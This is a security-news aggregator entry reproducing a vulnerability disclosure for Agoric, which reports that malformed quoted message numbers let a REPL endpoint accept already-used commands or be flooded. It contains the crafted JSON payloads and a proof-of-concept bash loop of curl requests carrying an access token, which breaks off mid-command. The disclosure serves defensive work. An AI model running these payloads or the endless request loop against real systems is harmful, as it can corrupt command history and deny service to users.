๐ Agoric: Improper Input Validation allows an attacker to "double spend" or "respend", violating the integrity of the message command history or causing DoS
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
Summary: Improper Input Validation allows an attacker to "double spend" or "respend", violating the integrity of the message command history or causing DoS Steps To Reproduce: I was curling random integers and found that I could do the following: json {"type":"doEval","number":500,"body":"test"} {"type":"doEval","number":501,"body":"test"} {"type":"doEval","number":"501\"","body":"test"} If I quote the integer and add an escaped \" , then I could send the number 500 again json {"type":"doEval","number":500","body":"test"} Let me know if this is an intended mechanism or not, but to be clear, here are the numbers: 502, 512, 522, "522\"", 502, 512, 522, "522\"", 502, 512, 522, "522\"" The test below is in the video: ```shell create an array of numbers I want to send twice FAKE_INT=( 502 512 522 '"522\""' 512 522 '"522\""' 512 522 '"522\""' 512 522 '"522\""' 522 '"522\""' 502 ) REPL_STRING='GWhZto7qBseiU7ihRSQvNHORwx4FJ7xDztFsogKjP%2FwdN1q3rQWSreoGMUC%2FVql9' just keep cycling thru the numbers above while true; do for FI in "${FAKE_INT[@]}"; do curl "http://127.0.0.1:8000/private/repl?accessToken=${REPL_STRING}" \ -H 'Connection: keep-alive' \ -H 'Pragma: no-cache' \ -H 'Cache-Control: no-cache' \ -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36' \ -H 'Content-Type: application/json' \ -H 'Accept: /' \ -H 'Origin: http://127.0.0.1:8000'... ...